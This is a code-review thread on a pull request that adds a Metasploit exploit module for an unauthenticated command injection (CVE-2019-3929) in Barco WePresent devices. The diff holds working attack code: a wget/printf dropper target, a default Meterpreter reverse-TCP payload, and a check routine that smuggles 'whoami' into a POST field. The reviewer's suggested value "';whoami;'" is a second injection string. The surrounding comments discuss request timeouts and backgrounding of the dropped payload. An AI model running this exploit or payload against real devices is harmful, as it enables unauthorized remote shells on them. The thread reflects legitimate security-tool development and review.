modules/exploits/linux/http/wepresent_cmd_injection.rb

```diff
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
+      'Description'    => %q(
+        This module exploits an unauthenticated remote command injection
+        vulnerability found in Barco WePresent and related OEM'ed products.
+        The vulnerability is triggered via an HTTP POST request to the
+        file_transfer.cgi endpoint.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Jacob Baines, @Junior_Baines',
+      'References'     =>
+        [
+          ['CVE', '2019-3929'],
+          ['EDB', '46786'],
+          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+        ],
+      'DisclosureDate' => "Apr 30, 2019",
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+         }],
+        ['Linux Dropper',
+         'Platform'        => 'linux',
+         'Arch'            => ARCH_ARMLE,
+         'CmdStagerFlavor' => ['printf', 'wget'],
+         'Type'            => :linux_dropper]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {
+        'SSL'               => true,
+        'RPORT'             => 443,
+        'CMDSTAGER::FLAVOR' => 'printf',
+        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
+      }))
+  end
+
+  def check
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'Pa_NotewhoamiPa_Note'"
```

Comment:
Would it make sense to use something like this instead ?

```suggestion
      dir: filter_bad_chars("';whoami;'")
```

Or, perhaps the `check_resp` HTTP request code could be replaced with a call to `execute_command('whoami')` instead? Re-using the `execute_command` function to execute a command would decrease lines of code.

Reply:
Instead of reusing execute_command, I moved to a single function that handles the POST request that both execute_command() and check() call. I didn't reuse execute_command due to the use of 'nil' in the request timeout (the final request that drops mettle never returns a response).

I believe this satisfies this comment to some extent. Although, not perfectly.

Reply:
Fair enough. `execute_command` doesn't support a `timeout` option.

I noticed you're backgrounding the command with `&` - is the result from the `whoami` command still returned after this change?

Reply:
The backgrounding only applies to execute_command() usage (stagers) and not check(), so the whoami in check() is unaffected. I'm happy to provide a new set of pcaps if desired though.

Reply:
Nah it's fine. I wasn't sure if that was still true after the `check` method had been modified to use `execute_command`.